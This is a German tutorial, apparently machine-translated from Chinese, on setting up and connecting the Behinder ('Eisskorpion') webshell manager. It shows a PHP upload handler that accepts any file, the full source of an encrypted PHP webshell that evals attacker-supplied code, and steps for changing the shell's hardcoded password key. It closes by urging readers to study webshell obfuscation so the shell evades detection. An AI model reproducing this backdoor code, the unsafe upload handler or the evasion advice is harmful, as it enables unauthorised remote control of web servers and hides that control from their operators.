Vorwort
Ich habe heute die neueste Version von Bing Scorpion 3.0 Beta2 heruntergeladen, kann aber immer noch keine Verbindung herstellen. Später habe ich den älteren Bruder des Unternehmens gebeten, den Grund herauszufinden. Hier ist eine Aufzeichnung, ich hoffe, sie wird Ihnen helfen.
Dieser Artikel ist relativ einfach, hauptsächlich für Anfänger mit geringem technischen Inhalt und hauptsächlich für Betriebsverfahren.
Schauen Sie sich zunächst an, welche Dateien heruntergeladen werden: Die
Serverdatei enthält Webshells in verschiedenen Sprachen, wie unten gezeigt:
Umgebungskonfiguration
Hier benutze ich die PHP-Webshell, um das Experiment durchzuführen. Zuerst habe ich eine virtuelle Windows-Maschine geöffnet, phpstudy heruntergeladen, Apache gestartet und dann einen PHP-Code für das Hochladen von Dateien geschrieben. Hier ist der PHP-Datei-Upload-Code, der mit dem Rookie-Tutorial geliefert wird. Der spezifische Code lautet wie folgt:
<!-- index.html代码 -->
<html>
<head>
<meta charset="utf-8">
<title>Upload</title>
</head>
<body>
<!-- 下面表单表示将接收到底文件传给upload_file.php去处理 -->
<form action="upload_file.php" method="post" enctype="multipart/form-data">
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>
// upload_file.php
<?php
if ($_FILES["file"]["error"] > 0)
{
echo "错误:" . $_FILES["file"]["error"] . "<br>";
}
else
{
echo "上传文件名: " . $_FILES["file"]["name"] . "<br>";
echo "文件类型: " . $_FILES["file"]["type"] . "<br>";
echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
echo "文件临时存储的位置: " . $_FILES["file"]["tmp_name"];
}
move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);
echo "文件存储在: " . "upload/" . $_FILES["file"]["name"] //文件会被上传到当前目录下的upload文件夹中
?>
Geben Sie den Appell-Code ein: Dieser Ordner sollte vorhanden sein, solange Sie phpstudy herunterladen. Ich habe ihn im Standardverzeichnis installiert. Die von upload_file.php geschriebene hochgeladene Datei muss im Upload-Ordner unter dem aktuellen Verzeichnis abgelegt werden Wir müssen selbst einen Upload-Ordner erstellen, wie oben gezeigt.
Verbinden Sie die Webshell
Die Upload-Seite wird in der Abbildung oben gezeigt. Klicken Sie auf Datei auswählen, um die Datei auszuwählen. Klicken Sie auf Senden, um unsere PHP-Webshell hochzuladen. Die folgende Abbildung wird angezeigt, wenn der Upload erfolgreich ist.
Doppelklicken Sie zu diesem Zeitpunkt, um unseren Eisskorpion zu öffnen.
Wenn er nicht geöffnet werden kann, ist möglicherweise die Java-Version falsch. Hier gebe ich meine eigene Java-Version als Referenz an.
Nach dem Öffnen wie in der folgenden Abbildung gezeigt:
Klicken Sie mit der rechten Maustaste in die leere Stelle und klicken Sie auf Hinzufügen:
Geben Sie die URL und das Kennwort ein und klicken Sie auf Speichern
Lassen Sie mich darüber sprechen, warum das Standardkennwort nicht mehr gültig ist und wie das Standardkennwort geändert werden kann:
Schauen wir uns den Quellcode von Bingscorps phpshell an:
<?php
@error_reporting(0);
session_start();
if ($_SERVER['REQUEST_METHOD'] === 'POST')
{
$key="e45e329feb5d925b"; //这一行为密码的md5的前16位
$_SESSION['k']=$key;
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{
public function __invoke($p) {
eval($p."");}}
@call_user_func(new C(),$params);
}
?>
Wie ich im Code markiert habe
$ key = "e45e329feb5d925b"; // Dies sind die ersten 16 Bits des md5 des Kennworts.
Wir gehen zur cmd5- Website, um Verschlüsselungs- und Entschlüsselungsvorgänge durchzuführen, und geben rebeyond ein: Es wurde
festgestellt, dass die ersten 16 des 32-Bit-md5 von rebeyond nur der Schlüssel im Code sind Der Wert von (ist die erste Zeile md5 (rebeyond, 32)). Jetzt sollte jeder wissen, wie man das Passwort ändert. Ersetzen Sie einfach den Schlüsselwert im Code durch die ersten 16 Ziffern des MD5 des Passworts, das Sie verwenden möchten, und verwenden Sie dann Ihr eigenes Passwort, um sich bei der Shell anzumelden. Wenn Sie beispielsweise admin als Kennwort verwenden möchten, lautet der MD5 von admin wie folgt: Zu
diesem Zeitpunkt müssen Sie nur den Wert von "$ key =" e45e329feb5d925b ";" im Code in 21232f297a57a5a7 ändern, um sich mit admin als Kennwort anzumelden. Apropos, es war sehr detailliert, also hör auf.
Eisskorpion Seite
Nachdem die Verbindung erfolgreich hergestellt wurde, lautet die Seite wie folgt:
Sie können sie gemäß Ihren Anforderungen verwenden. Ich schlage jedoch vor, dass Sie die Möglichkeit haben, die Verwirrung und Vermeidung von Webshell zu untersuchen. Andernfalls kann sie leicht überprüft und beendet werden.